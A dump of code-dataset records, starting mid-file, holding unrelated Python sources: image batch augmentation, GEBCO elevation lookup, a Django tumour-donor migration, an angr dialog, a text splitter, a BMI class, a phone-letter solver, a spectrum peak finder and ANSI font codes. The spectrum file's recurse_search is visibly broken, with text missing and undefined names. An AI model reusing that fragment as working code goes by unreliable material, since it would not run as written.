@property\n def images(self):\n return self._images\n\n @property\n def labels(self):\n return self._labels\n\n @property\n def num_examples(self):\n return self._num_examples\n\n @property\n def epochs_completed(self):\n return self._epochs_completed\n\n def next_batch(self, batch_size, shuffle, flip, whiten, noise, crop, crop_test):\n \"\"\"Return the next `batch_size` examples from this data set.\"\"\"\n \n start = self._index_in_epoch\n \n # Shuffle for the first epoch\n if self._epochs_completed == 0 and start == 0 and shuffle:\n perm0 = numpy.arange(self._num_examples)\n numpy.random.shuffle(perm0)\n self._images = self.images[perm0]\n self._labels = 
self.labels[perm0]\n\n        # Go to the next epoch\n        if start + batch_size > self._num_examples:  # this batch runs from _index_in_epoch to _index_in_epoch + batch_size\n            # reaching here means one full pass over the image set is complete, so reshuffle before assembling the next batch\n            # Finished epoch\n            self._epochs_completed += 1\n            # Get the rest examples in this epoch\n            rest_num_examples = self._num_examples - start\n            images_rest_part = self._images[start:self._num_examples]\n            labels_rest_part = self._labels[start:self._num_examples]\n\n            # Shuffle the data\n            if shuffle:\n                perm = numpy.arange(self._num_examples)\n                numpy.random.shuffle(perm)\n                self._images = self.images[perm]\n                self._labels = self.labels[perm]\n\n            # Start next epoch\n            start = 0\n            self._index_in_epoch = batch_size - rest_num_examples\n            end = self._index_in_epoch\n\n            images_new_part = self._images[start:end]\n            labels_new_part = self._labels[start:end]\n\n            if crop:\n                images_crop_1 = images_new_part\n                self._images_new_part_cut = self._image_crop(images_crop_1)\n\n                images_crop_2 = images_rest_part\n                self._images_rest_part_cut = self._image_crop(images_crop_2)\n\n            if crop_test:\n                images_crop_1 = images_new_part\n                self._images_new_part_cut_test = self._image_test_crop(images_crop_1)\n\n                images_crop_2 = images_rest_part\n                self._images_rest_part_cut_test = self._image_test_crop(images_crop_2)\n\n            if flip:\n                images_flip_1 = self._images_new_part_cut\n                self._images_new_part_cut = self._image_flip(images_flip_1)\n                images_flip_2 = self._images_rest_part_cut\n                self._images_rest_part_cut = self._image_flip(images_flip_2)\n\n            if whiten:\n                if crop:\n                    images_whiten_1 = self._images_new_part_cut\n                    self._images_new_part_cut = self._image_whitening(images_whiten_1)\n                    images_whiten_2 = self._images_rest_part_cut\n                    self._images_rest_part_cut = self._image_whitening(images_whiten_2)\n\n                if crop_test:\n                    images_whiten_1 = self._images_new_part_cut_test\n                    self._images_new_part_cut_test = self._image_whitening(images_whiten_1)\n                    images_whiten_2 = self._images_rest_part_cut_test\n                    self._images_rest_part_cut_test = self._image_whitening(images_whiten_2)\n\n            if noise:\n                images_noise_1 = self._images_new_part_cut\n                self._images_new_part_cut = self._image_noise(images_noise_1)\n                images_noise_2 = self._images_rest_part_cut\n                self._images_rest_part_cut = self._image_noise(images_noise_2)\n\n            if crop:\n                return numpy.concatenate((self._images_rest_part_cut, self._images_new_part_cut), axis=0), numpy.concatenate((labels_rest_part, labels_new_part), axis=0)\n            elif crop_test:\n                return numpy.concatenate((self._images_rest_part_cut_test, self._images_new_part_cut_test), axis=0), numpy.concatenate((labels_rest_part, labels_new_part), axis=0)\n\n        else:\n            self._index_in_epoch += batch_size\n            end = self._index_in_epoch\n\n            if crop:\n                images_crop = self._images[start:end]\n                self._cut_images = self._image_crop(images_crop)\n\n            if crop_test:\n                images_crop = self._images[start:end]\n                self._cut_test_images = self._image_test_crop(images_crop)\n\n            if flip:\n                images_flip = self._cut_images\n                self._cut_images = self._image_flip(images_flip)\n\n            if whiten:\n                if crop:\n                    images_whiten = self._cut_images\n                    self._cut_images = self._image_whitening(images_whiten)\n                if crop_test:\n                    images_whiten = self._cut_test_images\n                    self._cut_test_images = self._image_whitening(images_whiten)\n\n            if noise:\n                images_noise = self._cut_images\n                self._cut_images = self._image_noise(images_noise)\n\n            if crop:\n                return self._cut_images, self._labels[start:end]\n            elif crop_test:\n                return self._cut_test_images, self._labels[start:end]\n\n######################## data augmentation helpers #############################\n    def _image_crop(self, images, crop_shape=(24,24,3)):\n        # random crop (used for training images)\n        new_images = numpy.empty((images.shape[0],24,24,3))\n        for i in range(images.shape[0]):\n            old_image = images[i,:,:,:]\n            left = numpy.random.randint(old_image.shape[0] - crop_shape[0] + 1)\n            top = numpy.random.randint(old_image.shape[1] - crop_shape[1] + 1)\n            new_image = old_image[left:left+crop_shape[0],top:top+crop_shape[1], :]\n            new_images[i,:,:,:] = new_image\n\n        return new_images\n\n    def _image_test_crop(self, images, crop_shape=(24,24,3)):\n        # center crop (used for test images)\n        new_images = numpy.empty((images.shape[0],24,24,3))\n        for i in range(images.shape[0]):\n            old_image = images[i,:,:,:]\n            left = int((old_image.shape[0] - crop_shape[0])/2)\n            top = int((old_image.shape[1] - crop_shape[1])/2)\n            new_image = old_image[left:left+crop_shape[0],top:top+crop_shape[1], :]\n            new_images[i,:,:,:] = new_image\n\n        return new_images\n\n    def _image_whitening(self, images):\n        # per-image whitening (zero mean, unit variance)\n        for i in range(images.shape[0]):\n            old_image = images[i,:,:,:]\n            new_image = (old_image - numpy.mean(old_image)) / numpy.std(old_image)\n            images[i,:,:,:] = new_image\n\n        return images\n\n    def _image_flip(self, images):\n        # random horizontal flip\n        for i in range(images.shape[0]):\n\n            old_image = images[i,:,:,:]\n\n            if numpy.random.random() < 0.5:\n                new_image = cv2.flip(old_image, 1)\n            else:\n                new_image = old_image\n\n            images[i,:,:,:] = new_image\n\n        return images\n\n    def _image_noise(self, images, mean=0, std=0.01):\n        # additive Gaussian noise; the inner loops use r/c/ch so they do not clobber the image index i\n        for i in range(images.shape[0]):\n            old_image = images[i,:,:,:]\n            new_image = old_image\n            for r in range(old_image.shape[0]):\n                for c in range(old_image.shape[1]):\n                    for ch in range(old_image.shape[2]):\n                        new_image[r, c, ch] += random.gauss(mean, std)\n            images[i,:,:,:] = new_image\n\n        return images","sub_path":"icifar10.py","file_name":"icifar10.py","file_ext":"py","file_size_in_byte":13083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"602058798","text":"import numpy as np\nimport netCDF4\n\ndef geo_idx(dd, dd_array):\n    #\n    # returns the index of the closest degrees decimal value in the array.\n    # dd = degrees decimal (Float64)\n    # dd_array = array of degrees decimal values (Float64)\n    #\n    #\n    geo_index = (np.abs(dd_array - dd)).argmin()\n    return geo_index\n\ndef open_GEBCO_file(filepath):\n    #\n    # returns the NetCDF dataset plus arrays of the latitudes and longitudes read from it\n    # filepath = filepath to GEBCO file\n    #\n    #\n    NetCDF_dataset = netCDF4.Dataset(filepath)\n    lats = NetCDF_dataset.variables['lat'][:]\n    lons = NetCDF_dataset.variables['lon'][:]\n    return NetCDF_dataset, lats, lons\n\ndef get_GEBCO_info(dataset):\n    #\n    # prints metadata in GEBCO file\n    #\n    #\n    print(dataset.data_model)\n\n    for attr in dataset.ncattrs():\n        print(attr, '=', getattr(dataset, attr))\n\n    print(dataset.variables)\n    return\n\ndef get_elevation(lat, lon):\n    #\n    # returns the elevation given a latitude and longitude\n    #\n    lat_index = geo_idx(lat, lats)\n    lon_index = geo_idx(lon, lons)\n    return gebco.variables['elevation'][lat_index, lon_index]\n\n#\n#\n#Sea floor height (above mean sea level)\n#\n#\n#Tests\n#\ngebco, lats, lons = open_GEBCO_file('/media/mike/HDD/git/GEBCO/data/GEBCO_2014_2D.nc')\n#\n#\nprint(get_elevation(51.65, -3.2))\n#\n# individual tests\n#\nget_GEBCO_info(gebco)\nlat_index = geo_idx(51.65, lats)\nlon_index = geo_idx(-3.2, lons)\nprint('Latitude index: ', lat_index)\nprint('Longitude index: ', lon_index)\nprint('Latitude @ index: ',
gebco.variables['lat'][lat_index])\nprint('Longitude @ index: ', gebco.variables['lon'][lon_index])\nprint('Elevation at location: ', gebco.variables['elevation'][lat_index, lon_index])\n\n\nprint(get_elevation(51.464, 1.0485))\nprint(get_elevation(26.259, 52.622))\nprint(get_elevation(33.474, 120.712))\n","sub_path":"GEBCO_GetElevation.py","file_name":"GEBCO_GetElevation.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"426356643","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('tumour_type', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Analysis',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('desc_zh', models.TextField(blank=True)),\n ('desc_en', models.TextField(blank=True)),\n ('proc_zh', models.TextField(blank=True)),\n ('proc_en', models.TextField(blank=True)),\n ('result_zh', models.TextField(blank=True)),\n ('result_en', models.TextField(blank=True)),\n ('conc_zh', models.TextField(blank=True)),\n ('conc_en', models.TextField(blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='ClinicalInfo',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('pry_site_zh', models.CharField(help_text=b'primary site', max_length=128, blank=True)),\n ('pry_site_en', models.CharField(help_text=b'primary site', max_length=128, db_index=True, blank=True)),\n ('vital_status', models.NullBooleanField()),\n ('vital_status5', models.NullBooleanField(help_text=b'5 years vital status')),\n ('survival_day', models.SmallIntegerField(null=True)),\n ('stage', models.CharField(max_length=128, blank=True)),\n ('stage_supplemental', models.CharField(max_length=128, blank=True)),\n ('stage_system', models.CharField(max_length=128, blank=True)),\n ('grade', models.CharField(max_length=128, blank=True)),\n ('grade_supplemental', models.CharField(max_length=128, blank=True)),\n ('grade_system', models.CharField(max_length=128, blank=True)),\n ('desc_zh', models.TextField(help_text=b'description', blank=True)),\n ('desc_en', models.TextField(help_text=b'description', blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='Country',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name_zh', models.CharField(max_length=128)),\n ('name_en', models.CharField(max_length=128)),\n ('full_name_zh', models.CharField(max_length=128, blank=True)),\n ('full_name_en', models.CharField(max_length=128, blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='Donor',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('ngb_id', models.CharField(help_text=b'Format: NGBCD0000000001', unique=True, max_length=15, db_index=True)),\n ('org_id', models.CharField(help_text=b'origin id', max_length=128, blank=True)),\n ('gender', models.NullBooleanField(help_text=b'True is male and False is female.', db_index=True)),\n ('birthday', models.DateField(null=True)),\n ('diag_age', models.SmallIntegerField(null=True, db_index=True)),\n ('height', models.SmallIntegerField(help_text=b'cm', null=True)),\n ('weight', models.SmallIntegerField(help_text=b'kg', null=True)),\n ('pop_zh', models.CharField(help_text=b'population', 
max_length=128, blank=True)),\n                ('pop_en', models.CharField(help_text=b'population', max_length=128, blank=True)),\n                ('city_zh', models.CharField(max_length=128, blank=True)),\n                ('city_en', models.CharField(max_length=128, blank=True)),\n                ('state_zh', models.CharField(help_text=b'province or state', max_length=128)),\n                ('state_en', models.CharField(help_text=b'province or state', max_length=128)),\n                ('country', models.ForeignKey(related_name='Country_Donor', to='donor.Country', null=True)),\n            ],\n        ),\n        migrations.CreateModel(\n            name='ICD10',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('code', models.CharField(max_length=10)),\n                ('title', models.TextField()),\n                ('parent', models.ForeignKey(related_name='ICD10_children', blank=True, to='donor.ICD10', null=True)),\n            ],\n        ),\n        migrations.CreateModel(\n            name='Morph',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('code', models.CharField(max_length=6)),\n                ('title', models.TextField()),\n                ('parent', models.ForeignKey(related_name='Morph_children', blank=True, to='donor.Morph', null=True)),\n            ],\n        ),\n        migrations.CreateModel(\n            name='OtherInfo',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('label_zh', models.CharField(max_length=128)),\n                ('label_en', models.CharField(max_length=128)),\n                ('value_zh', models.CharField(max_length=128)),\n                ('value_en', models.CharField(max_length=128)),\n                ('donor', models.ForeignKey(related_name='Donor_OtherInfo', to='donor.Donor')),\n            ],\n        ),\n        migrations.CreateModel(\n            name='Region',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('name_zh', models.CharField(max_length=128)),\n                ('name_en', models.CharField(max_length=128)),\n            ],\n        ),\n        migrations.CreateModel(\n            name='Sample',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('ngb_id', models.CharField(help_text=b'Format: NGBCS0000000001', unique=True, max_length=15, db_index=True)),\n                ('org_id', models.CharField(help_text=b'origin id', max_length=128, blank=True)),\n                ('s_type', models.SmallIntegerField(choices=[(-1, b'unknown/no data'), (0, b'normal'), (1, b'primary tumour'), (2, b'secondary tumour')])),\n                ('t_type', models.SmallIntegerField(choices=[(0, b'tumor fresh tissue'), (1, b'tumor FF(fresh frozen)'), (2, b'tumor FFPE(Formalin-Fixed and Paraffin-Embedded)'), (3, b'matched normal peripheral blood'), (4, b'healthy human peripheral blood'), (5, b'leukemic blood'), (6, b'mouse xenograft derived from tumor'), (7, b'cell line derived from tumor'), (8, b'cell line derived from xenograft'), (9, b'cell line derived from normal tissue'), (10, b'other (specify)')])),\n                ('grade', models.CharField(max_length=128, blank=True)),\n                ('grade_supplemental', models.CharField(max_length=128, blank=True)),\n                ('grade_system', models.CharField(max_length=128, blank=True)),\n                ('date', models.DateField(null=True)),\n                ('donor', models.ForeignKey(related_name='Donor_Sample', to='donor.Donor')),\n            ],\n        ),\n        migrations.CreateModel(\n            name='Topo',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('code', models.CharField(max_length=6)),\n                ('title', models.CharField(max_length=256)),\n                ('icd_10', models.ForeignKey(related_name='ICD10_Topo', blank=True, to='donor.ICD10', null=True)),\n                ('parent', models.ForeignKey(related_name='Topo_children', blank=True, to='donor.Topo', null=True)),\n            ],\n        ),\n        migrations.CreateModel(\n            name='Treatment',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('tx_type_zh', models.CharField(help_text=b'treatment type', max_length=128)),\n                ('tx_type_en', models.CharField(help_text=b'treatment type', max_length=128)),\n                ('tx_result_zh', models.CharField(help_text=b'treatment result', max_length=128)),\n                ('tx_result_en', models.CharField(help_text=b'treatment result', max_length=128)),\n                ('date', models.DateField(default=None, null=True)),\n                ('donor', models.ForeignKey(related_name='Donor_Treatment', to='donor.Donor')),\n            ],\n        ),\n        migrations.AddField(\n            model_name='country',\n            name='region',\n            field=models.ForeignKey(related_name='Region_Country', blank=True, to='donor.Region', null=True),\n        ),\n        migrations.AddField(\n            model_name='clinicalinfo',\n            name='donor',\n            field=models.OneToOneField(related_name='Donor_ClinicalInfo', to='donor.Donor'),\n        ),\n        migrations.AddField(\n            model_name='clinicalinfo',\n            name='icd_10',\n            field=models.ForeignKey(related_name='ICD10_Donor', to='donor.ICD10', null=True),\n        ),\n        migrations.AddField(\n            model_name='clinicalinfo',\n            name='morph',\n            field=models.ForeignKey(related_name='Morph_Donor', to='donor.Morph', null=True),\n        ),\n        migrations.AddField(\n            model_name='clinicalinfo',\n            name='pry_site_class',\n            field=models.ForeignKey(related_name='PrimarySiteClass_Donor', to='tumour_type.PrimarySiteClass', null=True),\n        ),\n        migrations.AddField(\n            model_name='clinicalinfo',\n            name='subtype',\n            field=models.ForeignKey(related_name='SubType_Donor', to='tumour_type.TumourType'),\n        ),\n        migrations.AddField(\n            model_name='clinicalinfo',\n            name='topo',\n            field=models.ForeignKey(related_name='Topo_Donor', to='donor.Topo', null=True),\n        ),\n        migrations.AddField(\n            model_name='clinicalinfo',\n            name='tumour_type',\n            field=models.ForeignKey(related_name='TumourType_Donor', to='tumour_type.TumourType'),\n        ),\n        migrations.AddField(\n            model_name='analysis',\n            name='sample',\n            field=models.ForeignKey(related_name='Sample_Analysis', to='donor.Sample'),\n        ),\n    ]\n","sub_path":"website/donor/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":10765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"458300218","text":"from typing import Optional, TYPE_CHECKING\n\nfrom PySide2.QtWidgets import QDialog, QVBoxLayout, QHBoxLayout, QLabel, QPushButton, QLineEdit\nfrom angr.analyses.decompiler.structured_codegen import CVariable, CFunction, CConstruct, CFunctionCall\n\nif TYPE_CHECKING:\n    from angrmanagement.ui.views.disassembly_view import DisassemblyView\n    from angrmanagement.ui.views.code_view import CodeView\n\n\nclass NodeNameBox(QLineEdit):\n    def __init__(self, textchanged_callback, parent=None):\n        super().__init__(parent)\n\n        self.textChanged.connect(textchanged_callback)\n\n    @property\n    def name(self):\n        text = self.text()\n        if self._is_valid_node_name(text):\n            return text.strip()\n        return None\n\n    @staticmethod\n    def _is_valid_node_name(name):\n        return name and not (' ' in name.strip())\n\n\nclass RenameNode(QDialog):\n    def __init__(self, disasm_view: Optional['DisassemblyView'] = None, code_view: Optional['CodeView'] = None,\n                 node: Optional[CConstruct] = None, parent=None):\n        super().__init__(parent)\n\n        # initialization\n        self._disasm_view = disasm_view\n        self._code_view =
code_view\n self._node = node\n\n self._name_box = None\n self._status_label = None\n self._ok_button = None\n\n self.setWindowTitle('Rename Variable')\n\n self.main_layout = QVBoxLayout()\n\n self._init_widgets()\n\n self.setLayout(self.main_layout)\n\n #\n # Private methods\n #\n\n def _init_widgets(self):\n\n # name label\n\n name_label = QLabel(self)\n name_label.setText('New name')\n\n name_box = NodeNameBox(self._on_name_changed, self)\n if self._node is not None:\n # parse node type, either a Function header or a Variable.\n if isinstance(self._node, CVariable) and self._node.unified_variable and self._node.unified_variable.name:\n name_box.setText(self._node.unified_variable.name)\n elif isinstance(self._node, CVariable) and self._node.variable.region == '':\n name_box.setText(self._node.variable.name)\n elif isinstance(self._node, CFunction) and self._node.name:\n name_box.setText(self._node.name)\n elif isinstance(self._node, CFunctionCall):\n name_box.setText(self._node.callee_func.name)\n\n name_box.selectAll()\n self._name_box = name_box\n\n label_layout = QHBoxLayout()\n label_layout.addWidget(name_label)\n label_layout.addWidget(name_box)\n self.main_layout.addLayout(label_layout)\n\n # status label\n status_label = QLabel(self)\n self.main_layout.addWidget(status_label)\n self._status_label = status_label\n\n # buttons\n ok_button = QPushButton(self)\n ok_button.setText('OK')\n ok_button.setEnabled(False)\n ok_button.clicked.connect(self._on_ok_clicked)\n self._ok_button = ok_button\n\n cancel_button = QPushButton(self)\n cancel_button.setText('Cancel')\n cancel_button.clicked.connect(self._on_cancel_clicked)\n\n buttons_layout = QHBoxLayout()\n buttons_layout.addWidget(ok_button)\n buttons_layout.addWidget(cancel_button)\n\n self.main_layout.addLayout(buttons_layout)\n\n #\n # Event handlers\n #\n\n def _on_name_changed(self, new_text): # pylint:disable=unused-argument\n\n if self._name_box is None:\n # initialization is not done yet\n return\n\n if self._name_box.name is None:\n # the variable name is invalid\n self._status_label.setText('Invalid')\n self._status_label.setProperty('class', 'status_invalid')\n self._ok_button.setEnabled(False)\n else:\n self._status_label.setText('Valid')\n self._status_label.setProperty('class', 'status_valid')\n self._ok_button.setEnabled(True)\n\n self._status_label.style().unpolish(self._status_label)\n self._status_label.style().polish(self._status_label)\n\n def _on_ok_clicked(self):\n node_name = self._name_box.name\n if node_name is not None:\n if self._code_view is not None and self._node is not None:\n if isinstance(self._node, CVariable) and self._node.unified_variable is not None:\n self._node.unified_variable.name = node_name\n self._node.unified_variable.renamed = True\n elif isinstance(self._node, CVariable) and self._node.variable.region == '':\n self._code_view.workspace.instance.kb.labels[self._node.variable.addr] = node_name\n self._node.variable.name = node_name\n elif isinstance(self._node, CFunction):\n code_kb = self._code_view.codegen.kb\n code_kb.functions[self._node.name].name = node_name\n self._node.name = node_name\n self._node.demangled_name = node_name\n elif isinstance(self._node, CFunctionCall):\n self._node.callee_func.name = node_name\n\n self._code_view.codegen.am_event()\n self.close()\n\n def _on_cancel_clicked(self):\n 
self.close()\n","sub_path":"angrmanagement/ui/dialogs/rename_node.py","file_name":"rename_node.py","file_ext":"py","file_size_in_byte":5266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"476616351","text":"import numpy as np\nimport sys\nimport os\n\nfrom util import *\n# specify the input path\ntrain_ratio = .9\nfname = 'text8_raw.txt'\n\ndata_dir = '/Users/Qihong/Dropbox/github/char_lstm/data/text8/'\ninput_file_path = os.path.join(data_dir, fname)\n\n# 10^8 chars in the file\nnum_chars , _ , _ = get_doc_counts(input_file_path)\ntrain_size = int(num_chars * train_ratio)\nvalid_size = int(num_chars * (1 - train_ratio))\n\n# load the text file\nfile = open(input_file_path, 'r')\n\n# split training and test set\n# read the training seq\ntrain = file.read(train_size)\n# no-op seek: the file position is already at the end of the training split\nfile.seek(file.tell())\n# read the valid seq\nvalid = file.read(valid_size)\n\n# save them as txt\nwrite2txtfile(train, data_dir, 'train.txt')\nwrite2txtfile(valid, data_dir, 'valid.txt')\n\n# convert text to ascii values - NOT NEEDED FOR THE CHAR_LSTM\n# train = string2list_of_ascii(train)\n# valid = string2list_of_ascii(valid)\n\n# write it to a .npz file\n# np.savez(path+fname_out, train=train, valid=valid)\n\n# # check file\n# npzfile = np.load(path+fname_out)\n# print npzfile.files\n# temp = npzfile['train']\n# print type(temp[1])","sub_path":"data/txt_split.py","file_name":"txt_split.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"172770659","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"BMI class.\"\"\"\n\n\nclass BMI:\n\n    __weight = None\n    __height = None\n    __bmi = None\n    __perfect_bmi = 21.75\n    __rate = 1\n\n    def __init__(self, weight=None, height=None):\n        \"\"\"Init BMI class.\"\"\"\n        if weight is not None and isinstance(weight, (float, int)):\n            self.__set_weight(weight)\n        else:\n            print('Wrong weight.')\n        if height is not None and isinstance(height, float):\n            self.__set_height(height)\n        else:\n            print('Wrong height.')\n\n    def get_bmi(self):\n        \"\"\"Return BMI.\"\"\"\n        if self.__calculate() is True:\n            return self.__bmi\n        else:\n            return False\n\n    def norm(self):\n        \"\"\"Check whether BMI is within the normal range.\"\"\"\n        if self.__calculate() is True:\n            if self.__bmi < (18.5 / self.__rate):\n                return -1\n            elif self.__bmi >= (25 / self.__rate):\n                return 1\n            else:\n                return 0\n        else:\n            return False\n\n    def get_correct_weight(self):\n        \"\"\"Get the recommended body weight.\"\"\"\n        if self.__calculate() is True:\n            if self.__bmi < (18.5 / self.__rate):\n                return (18.5 / self.__rate) * (self.__height ** 2)\n            elif self.__bmi >= (25 / self.__rate):\n                return (24.99 / self.__rate) * (self.__height ** 2)\n            else:\n                return (self.__perfect_bmi / self.__rate) * (self.__height ** 2)\n        else:\n            return False\n\n    def __set_weight(self, person_weight):\n        \"\"\"Set weight.\"\"\"\n        self.__weight = person_weight\n\n    def __set_height(self, person_height):\n        \"\"\"Set height.\"\"\"\n        self.__height = person_height\n\n    def __calculate(self):\n        \"\"\"Calculate BMI.\"\"\"\n        if self.__weight is not None and self.__height is not None:\n            self.__bmi = (self.__weight / self.__height ** 2) / self.__rate\n            return True\n        else:\n            return False\n","sub_path":"src/bmi.py","file_name":"bmi.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"289743406","text":"'''\n17.
Letter Combinations of a Phone Number\nDifficulty: Medium\nGiven a digit string, return all possible letter combinations that the number could represent.\n\nA mapping of digit to letters (just like on the telephone buttons) is given below.\n\n\n\nInput:Digit string \"23\"\nOutput: [\"ad\", \"ae\", \"af\", \"bd\", \"be\", \"bf\", \"cd\", \"ce\", \"cf\"].\nNote:\nAlthough the above answer is in lexicographical order, your answer could be in any order you want.\n'''\n\nclass Solution(object):\n    def letterCombinations(self, digits):\n        \"\"\"\n        :type digits: str\n        :rtype: List[str]\n        \"\"\"\n        encodings = [\"\", \"\",\"abc\",\"def\",\"ghi\",\"jkl\",\"mno\",\"pqrs\",\"tuv\",\"wxyz\"]\n        result = [\"\"]\n        for d in digits:\n            encodes = encodings[int(d)]\n            result = [r + e for r in result for e in encodes]\n        return result if len(digits) > 0 else []\n","sub_path":"17_letter_combinations_of_phone_number.py","file_name":"17_letter_combinations_of_phone_number.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"555870752","text":"'''\nThe purpose of a spectrum object is to maintain the calculated values for a given spectrum.\n\nHistory:\n\n6/25/2018: Class created\n\n'''\nimport numpy as np\n\nclass Spectrum:\n\n\tdef __init__(self, waves, name):\n\n\t\tself.waves = waves\n\t\tself.name = name\n\t\tself.isSolved = False\n\t\tself.values = [0,0,0]\n\t\tself.grpsize = 8\n\t\tself.peaks = self.findpeaks()\n\t\t\n\n\tdef findpeaks(self):\n\t\tstart = 0\n\t\tfinish = start + self.grpsize\n\t\tpeakindex = []\n\t\tpstart = 0\n\n\n\t\twhile finish < 2048:\n\t\t\tsection = np.array(self.waves[start:finish])\n\t\t\tdowncheck = -np.sort(-section)\n\t\t\tif np.array_equal(section, downcheck):\n\t\t\t\tpstart = section[0]\n\t\t\t\tval, index = self.recurse_search(finish)\n\t\t\t\tpeakindex.append((val,index))\n\t\t\t\tfinish = index\n\n\t\t\tstart = finish\n\t\t\tfinish = start + self.grpsize\n\n\t\t# return the collected (value, index) peak pairs\n\t\treturn peakindex\n\n\tdef pickpeak(self, wantedindices):\n\t\tpeaks = []\n\t\tbuffer = 4\n\t\tfor index in wantedindices:\n\t\t\ttemplist = self.waves[index-buffer : index+buffer]\n\t\t\ttemplist = np.sort(templist)\n\t\t\tif len(np.nonzero(self.waves == templist[0])[0]) == 1:\n\t\t\t\tpeaks.append(np.nonzero(self.waves == templist[0])[0][0])\n\t\t\telse:\n\t\t\t\tmultiples = np.nonzero(self.waves == templist[0])\n\t\t\t\tfor idx in multiples[0]:\n\t\t\t\t\tif idx < index+buffer and idx > index-buffer:\n\t\t\t\t\t\tpeaks.append(idx)\n\t\treturn peaks\n\n\tdef recurse_search(self, index):\n\t\tval, idx = self.fall_down(index)\n\t\ttempsect = np.array(self.waves[idx:(idx+self.grpsize)])\n\t\tcount = 0\n\t\ttempidx = idx\n\t\twhile count<next:\n\t\t\tcurr = next\n\t\t\tcount+=1\n\t\t\tnext = self.waves[count]\n\n\t\treturn (curr, count)\n\n\n","sub_path":"Honors Thesis Research/Code/Old Versions/Data Redux V2/Extras/spectrum.py","file_name":"spectrum.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"341163545","text":"from .dictionary import Dictionary\n\nclass Font(str):\n\n    def __new__(cls, value):\n        self = super(Font, cls).__new__(cls, '\\x1b[{}m'.format(value))\n        self.value = str(value)\n        return self\n\n    def __repr__(self):\n        return '{}({!r})'.format(self.__class__.__name__, self.value)\n\n    def __add__(self, other):\n        if isinstance(other, self.__class__):\n            return self.__class__('{};{}'.format(self.value, other.value))\n        return super(Font, self).__add__(other)\n\n    def __getitem__(self, font):\n        return self + fonts[font]\n\n    def __getattr__(self, font):\n        try:\n            return self[font]\n        except KeyError as error:\n            raise AttributeError(*error.args)\n\n    def __call__(self, string):\n        return self + string + fonts.RESET\n\nfonts = Dictionary(\n\n    RESET = Font(0),\n    BOLD = Font(1),\n    DIM = Font(2),\n    ITALIC = Font(3),\n    UNDERLINE = Font(4),\n    BLINK = Font(5),\n    REVERSE = Font(7),\n    HIDDEN = Font(8),\n\n    RESET_BOLD = Font(21),\n    RESET_DIM = Font(22),\n    RESET_ITALIC = Font(23),\n    RESET_UNDERLINE = Font(24),\n\n    BLACK = Font(30),\n    RED = Font(31),\n    GREEN = Font(32),\n    YELLOW = Font(33),\n    BLUE = Font(34),\n    MAGENTA = Font(35),\n    CYAN = Font(36),\n    WHITE = Font(37),\n    RESET_FOREGROUND = Font(39),\n\n    ON_BLACK = Font(40),\n    ON_RED = Font(41),\n    ON_GREEN = Font(42),\n    ON_YELLOW = Font(43),\n    ON_BLUE = Font(44),\n    ON_MAGENTA = Font(45),\n    ON_CYAN = Font(46),\n    ON_WHITE = Font(47),\n    RESET_BACKGROUND = Font(49),\n\n    BRIGHT_BLACK = Font(90),\n    BRIGHT_RED = Font(91),\n    BRIGHT_GREEN = Font(92),\n    BRIGHT_YELLOW = Font(93),\n    BRIGHT_BLUE = Font(94),\n    BRIGHT_MAGENTA = Font(95),\n    BRIGHT_CYAN = Font(96),\n    BRIGHT_WHITE = Font(97),\n\n    ON_BRIGHT_BLACK = Font(100),\n    ON_BRIGHT_RED = Font(101),\n    ON_BRIGHT_GREEN = Font(102),\n    ON_BRIGHT_YELLOW = Font(103),\n    ON_BRIGHT_BLUE = Font(104),\n    ON_BRIGHT_MAGENTA = Font(105),\n    ON_BRIGHT_CYAN = Font(106),\n    ON_BRIGHT_WHITE = Font(107),\n\n)\n","sub_path":"pychi/log/utils/font.py","file_name":"font.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
